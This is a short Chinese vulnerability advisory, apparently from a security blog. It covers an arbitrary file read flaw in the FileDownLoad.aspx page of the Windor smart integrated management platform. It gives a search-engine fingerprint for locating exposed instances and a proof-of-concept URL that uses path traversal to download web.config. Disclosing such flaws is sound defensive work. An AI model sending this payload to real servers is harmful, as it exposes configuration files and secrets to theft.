Windor 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞

# Windor 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 ## 漏洞描述 Windor 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞，通过漏洞攻击者可下载服务器中的任意文...

Windor 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞

漏洞描述

Windor 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞，通过漏洞攻击者可下载服务器中的任意文件

漏洞影响

Windor 智慧综合管理平台

网络测绘

"汇智信息" && title="智慧综合管理平台登入"

漏洞复现

登陆页面

验证POC

http://xxx.xxx.xxx.xxx/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config

发表于 2024-07-12 18:47:49
阅读 ( 2263 )
分类：Web应用

站长统计